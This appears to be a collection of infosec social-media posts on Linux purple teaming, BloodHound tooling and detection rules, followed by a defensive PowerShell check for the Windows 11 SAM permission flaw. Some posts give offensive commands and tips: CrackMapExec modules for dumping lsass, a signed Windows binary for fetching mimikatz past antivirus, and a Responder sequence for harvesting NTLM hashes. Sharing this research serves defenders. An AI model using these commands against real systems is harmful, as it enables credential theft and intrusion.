💥 2026 - here we go! I am excited to announce the release of "Linux Attack, Detection, and Live Forensics v2.0 - Hands-on Purple Teaming Playbook"! In this fully hands-on guide, I've leveled up the Linux-oriented purple teaming experience to bridge the gap between red and blue teams like never before:
- 💙 Focus on cutting-edge research and development of Linux offensive techniques -> empowering blue teams to understand and anticipate real-world Linux threats.
- ❤️ Dive into the detection perspective, explore corresponding events, telemetry, evidence, and chained detections -> giving red teams the insights to refine their Linux evasion strategies.
- 💜 Map it all to expected EDR/Runtime functionalities and DFIR processes, fostering true collaboration for purple teaming excellence.
The link is here: https://t.co/SUktIBXgHt
Check out GoLinHound:
- Discovers Linux & SSH attack paths
- Outputs OpenGraph JSON for BloodHound ingestion
- Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths
https://t.co/HPh2xiiCzl
Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed.
https://t.co/3yrHOYHAfc
My latest North Korea research with @martyn_williams is now publicly available: https://t.co/SdURXMxPj7 Also added it to the DB: https://t.co/HRCQcgvcZz
Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎
Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀
I've integrated them into CrackMapExec as modules:
1⃣ -M handlekatz
2⃣ -M nanodump
3⃣ -M procdump (as bonus 😝)
(dmp parsed by pypykatz from @SkelSec)
Available on @porchetta_ind 🪂
Threema does not have forward secrecy (https://t.co/WZKvpI6gx6) and local keys are stored insecurely. DROPPED from https://t.co/9O7m8Nq3XB. Stay safe. #privacy #COP26
Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!
In case you want to see something cool about CrackMapExec and Responder 😌😋
1⃣ cme smb <ip> -u user -p pass --shares
2⃣ Responder -I eth0
3⃣ cme smb <ip> -u user -p pass -M slinky -o ...
Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥
🪂
For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner
We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently
THOR Lite
https://t.co/gG1xDLRnjz
YARA rules
https://t.co/j6k4ydJd4i
https://t.co/pJiVhY0f10
I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️
https://t.co/feS1Cs6GaJ
Yarh, for some reason on Win11 the SAM file is now READ for users.
So if you have shadow volumes enabled you can read the SAM file like this:
I don't know the full extent of the issue yet, but it's too many to not be a problem, I think.
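As an added audit check (written for this page, not code from the post's author), the following PowerShell snippet lets a defender confirm the two conditions the post describes on a given Windows 11 host: whether BUILTIN\Users has read access to the SAM hive, and whether any Volume Shadow Copies exist that would expose an older, readable copy of it. Paths and group names are standard Windows values; the output strings are my own.

```powershell
# Audit the ACL on the live SAM hive. The hive itself is locked by the kernel,
# but reading its security descriptor only needs READ_CONTROL, which Get-Acl uses.
$hive = Join-Path $env:SystemRoot 'System32\config\SAM'
$acl  = Get-Acl -Path $hive

# Look for an Allow ACE that grants BUILTIN\Users any read-data right.
$usersCanRead = $acl.Access | Where-Object {
    $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
    $_.AccessControlType -eq 'Allow' -and
    (($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData) -ne 0)
}

if ($usersCanRead) {
    Write-Warning "BUILTIN\Users has read access to $hive (unexpected; default is SYSTEM/Administrators only)"
} else {
    Write-Output "SAM hive ACL looks normal: no read access for BUILTIN\Users"
}

# A permissive ACL on the live hive only becomes readable in practice through a
# shadow copy, so enumerate existing snapshots as the second half of the check.
$shadows = Get-CimInstance -ClassName Win32_ShadowCopy
if ($shadows) {
    Write-Warning ("{0} shadow copy/copies present; an over-permissive SAM ACL is exposed through them" -f @($shadows).Count)
    $shadows | Select-Object ID, InstallDate, DeviceObject | Format-Table -AutoSize
} else {
    Write-Output "No shadow copies present"
}
```

Run it in an elevated PowerShell session. If both warnings fire, the host has the condition the post describes; the usual remediation (from Microsoft's guidance for this class of issue, restated here from memory rather than from the post) is to restore inheritance on the config directory with `icacls %windir%\system32\config\*.* /inheritance:e` and then delete existing shadow copies, since snapshots taken while the ACL was wrong keep the readable copy.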